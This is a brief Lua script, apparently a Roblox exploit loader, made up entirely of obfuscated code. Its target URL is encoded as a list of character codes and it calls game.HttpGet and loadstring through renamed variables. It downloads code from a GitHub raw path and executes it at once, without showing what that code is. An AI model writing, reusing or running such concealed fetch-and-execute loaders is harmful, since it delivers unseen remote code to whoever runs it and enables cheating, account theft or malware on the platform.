local O0O0O0 = string.char
local O0OO00 = O0O0O0(104,116,116,112,115,58,47,47,114,97,119,46,103,105,116,104,117,98,117,115,101,114,99,111,110,116,101,110,116,46,99,111,109,47,71,114,101,99,107,66,108,111,120,47,97,101,102,102,101,47,114,101,102,115,47,104,101,97,100,115,47,109,97,105,110,47,87,104,105,116,101,108,105,115,116)
local _0OOO0 = (function(_)
    local l = ""
    for i = 1, #_ do
        local c = string.byte(_, i)
        l = l .. string.char(c)
    end
    return l
end)
local __00O0 = game
local _O00O_ = __00O0["HttpGet"]
local __O0O_ = loadstring
__O0O_(_0OOO0(_O00O_(__00O0, O0OO00)))()
